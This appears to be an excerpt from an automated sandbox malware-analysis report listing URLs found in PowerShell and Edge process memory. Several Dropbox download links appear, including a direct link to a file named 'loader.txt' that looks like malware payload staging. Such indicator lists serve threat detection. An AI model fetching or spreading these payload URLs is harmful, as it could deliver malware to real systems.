                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                    Source: msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                    Source: msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com/cd/0/get/CgBHN7V4UpDgKe31HldoFFzKutRH
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com/cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtb
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com/cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com/cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJy
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84395000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/0hdi5yqluk704whzcrld6/loader.txt?rlkey=b3m23z6tgb7mwwfbcjqi9kumq&dl=1
